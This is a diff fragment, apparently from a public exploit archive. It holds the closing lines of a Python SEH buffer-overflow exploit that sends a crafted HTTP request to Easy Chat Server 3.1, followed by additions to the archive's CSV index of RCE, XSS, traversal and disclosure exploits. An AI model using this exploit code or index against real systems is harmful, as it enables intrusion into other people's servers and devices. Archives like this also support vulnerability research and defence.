+        "GET /chat.ghp?username=" + junk + nseh + seh + nops + buf + "&password=&room=1&sex=1 HTTP/1.1\r\n"
+        "User-Agent: Mozilla/4.0\r\n"
+        "Host: 192.168.1.136:80\r\n"
+        "Accept-Language: en-us\r\n"
+        "Accept-Encoding: gzip, deflate\r\n"
+        "Referer: http://192.168.1.136\r\n"
+        "Connection: Keep-Alive\r\n\r\n"
+        )
+client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
+client.connect((host, port)) # Connect to user supplied port and IP address
+client.send(header) # Send the user command with a variable length name
+client.close() # Close the Connection

files_exploits.csv

@@ -18718,6 +18718,8 @@ id,file,description,date,author,type,platform,port
 50974,exploits/windows/remote/50974.py,"IOTransfer 4.0 - Remote Code Execution (RCE)",1970-01-01,"Tomer Peled",remote,windows,
 50983,exploits/python/remote/50983.py,"rpc.py 0.6.0 - Remote Code Execution (RCE)",1970-01-01,"Elias Hohl",remote,python,
 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",1970-01-01,LiquidWorm,remote,hardware,
+50996,exploits/hardware/remote/50996.txt,"Omnia MPX 1.5.0+r1 - Path Traversal",1970-01-01,"Momen Eldawakhly",remote,hardware,
+50999,exploits/windows/remote/50999.py,"Easy Chat Server 3.1 - Remote Stack Buffer Overflow (SEH)",1970-01-01,r00tpgp,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45044,9 +45046,18 @@ id,file,description,date,author,type,platform,port
 50971,exploits/multiple/webapps/50971.txt,"Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,Vulnz,webapps,multiple,
 50976,exploits/php/webapps/50976.txt,"Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Giulio Garzia Ozozuz",webapps,php,
 50978,exploits/php/webapps/50978.py,"CodoForum v5.1 - Remote Code Execution (RCE)",1970-01-01,"Krish Pandey",webapps,php,
-50979,exploits/multiple/webapps/50979.py,"OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)",1970-01-01,"Thomas Knudsen",webapps,multiple,
+50979,exploits/multiple/webapps/50979.py,"OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",webapps,multiple,
 50980,exploits/php/webapps/50980.txt,"WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
 50982,exploits/multiple/webapps/50982.txt,"Geonetwork 4.2.0 - XML External Entity (XXE)",1970-01-01,"Amel BOUZIANE-LEBLOND",webapps,multiple,
 50984,exploits/hardware/webapps/50984.py,"Dingtian-DT-R002 3.1.276A - Authentication Bypass",1970-01-01,"Victor Hanna",webapps,hardware,
 50986,exploits/hardware/webapps/50986.txt,"Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Directory Traversal",1970-01-01,LiquidWorm,webapps,hardware,
 50988,exploits/php/webapps/50988.txt,"WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Steffin Stanly",webapps,php,
+50989,exploits/hardware/webapps/50989.txt,"Wavlink WN533A8 - Cross-Site Scripting (XSS)",1970-01-01,"Ahmed Alroky",webapps,hardware,
+50991,exploits/hardware/webapps/50991.txt,"Wavlink WN530HG4 - Password Disclosure",1970-01-01,"Ahmed Alroky",webapps,hardware,
+50990,exploits/hardware/webapps/50990.txt,"Wavlink WN533A8 - Password Disclosure",1970-01-01,"Ahmed Alroky",webapps,hardware,
+50992,exploits/php/webapps/50992.txt,"WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download",1970-01-01,SecuriTrust,webapps,php,
+50993,exploits/php/webapps/50993.txt,"WordPress Plugin Duplicator 1.4.7 - Information Disclosure",1970-01-01,SecuriTrust,webapps,php,
+50994,exploits/php/webapps/50994.txt,"CuteEditor for PHP 6.6 - Directory Traversal",1970-01-01,"Stefan Hesselman",webapps,php,
+50995,exploits/php/webapps/50995.py,"mPDF 7.0 - Local File Inclusion",1970-01-01,"Musyoka Ian",webapps,php,
+50997,exploits/php/webapps/50997.py,"NanoCMS v0.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,p1ckzi,webapps,php,
+50998,exploits/linux/webapps/50998.py,"Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Emir Polat",webapps,linux,